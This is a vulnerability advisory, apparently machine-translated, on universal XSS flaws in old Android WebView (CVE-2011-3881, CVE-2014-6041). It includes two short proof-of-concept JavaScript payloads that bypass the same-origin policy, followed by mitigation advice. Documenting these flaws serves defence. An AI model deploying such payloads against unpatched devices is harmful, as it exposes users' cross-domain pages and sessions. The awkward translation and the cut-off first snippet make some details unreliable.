Android security WebViewUXSS vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201678636
Type myhack58
Reporter 御安全
Modified 2016-09-02T00:00:00


0X01 introduction

XSSis more familiar to us of an attack, including storage-typeXSS, a reflective-typeXSS, DOM XSS, etc., but UXSS(universal typeXSS)in addition, a different vulnerability types, mainly reflected in the vulnerability of the carrier and sphere of influence.

XSSthe problem stems from a certain WEB site or application there are security issues, but by the same origin policy constraints, the attacker can only access the vulnerability of the site the answer information, can't access the other domain of the answer information.

UXSS is mainly due to the browser or browser extension program security flaws, don't need the website itself, there is vulnerability can also trigger the vulnerability, an attacker can get to the browser to open and cache all of the pages to a different domain, session information, and therefore the UXSS vulnerability lethality is very strong.

Since Google took WebKit ported to Android, and as a WebView component package in the SDK, but some occur before in the PC version of chrome of the WebKit vulnerability in the SDK and not fixed, so the tragedy of history on the android once again staged:


Vulnerabilities related to the CAN on https://bugs. chromium. org/p/chromium/issues/list search. Below are a few of the corresponding vulnerability.

0X02 CVE-2 0 1 1-3 8 8 1

WebKit, as used in Google Chrome before 15.0.874.102 and Android before 4.4, allows remote attackers to bypass the Same Origin Policy and conduct Universal XSS (UXSS) attacks via vectors related to

(1) the DOMWindow::clear function and use of a selection object,

(2) the Object::GetRealNamedPropertyInPrototypeChain function and use of an proto property,

(3) the HTMLPlugInImageElement::allowedToLoadFrameURL function and use of a javascript: URL,

(4) incorrect origins for XSLT-generated documents in the XSLTProcessor::createDocumentFromSource function, and

(5) improper handling of synchronous frame loads in the ScriptController::executeIfJavaScriptURL function.

The vulnerability is mainly due to the HTMLPlugInImageElement::allowedToLoadFrameURL function in the Javascript URL address check is insufficient,the source detection is not the whole cause of the cross-domain problem:

POC: the

<script>window. onload = function(){

object = document. createElement("object");

object. data = "";

document. body. appendChild(object);

object. onload = function() {

object. data = "javascript:alert(document. body. innerHTML)";

object. innerHTML = "foo";



0X03 CVE-2 0 1 4-6 0 4 1

The Android WebView in Android before 4.4 allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a \u0000 character, as demonstrated by an onclick="window. open ('\u0000javascript: sequence to the Android Browser application 4.2.1 or a third-party web browser.

Because many manufacturers are directly using the system's own WebView, this will be the impact of vulnerability is further magnified, resulting in many mainstream applications have shots.

POC: the

<input type=button value="test" onclick="

a=document. createElement('script');

a. id='AA';

a. src='\u0000https://js. stripe. com/v2/';

document. body. appendChild(a);

setTimeout(function(){if(typeof(document. getElementById('AA'))!==' undefined'){alert(Stripe);}

else{alert(2);}}, 4 0 0);

return false;">

0X04 detection

Such vulnerability may be by Imperial security dynamic the way to automate the detection, correlation detection of the sample can be from https://bugs. chromium. org/p/chromium/issues/detail? id=xxx(bugid in the query.

0X05 security recommendations

Previously mentioned these UXSS vulnerabilities are already on Android 4.4, fix, while it also provides automatic upgrade webkit the function, so that timely repair vulnerabilities.


1) try using the latest version of the Android system

2) try not to feel free to click Security unknown link


1) The client to use onPageStarted (WebView view, String url, Bitmap favicon)method in the jump before the cross-domain determination

2) Use the latest Webkit core, but the APK size becomes large, and the subsequent need to follow the Google Webkit the official update.

3) The client of the iframe object tag attributes to be filtered

4 regularly using vulnerability tools to detect, such as the Imperial security vulnerability database will be based on market samples of synchronization updates

0X06 reference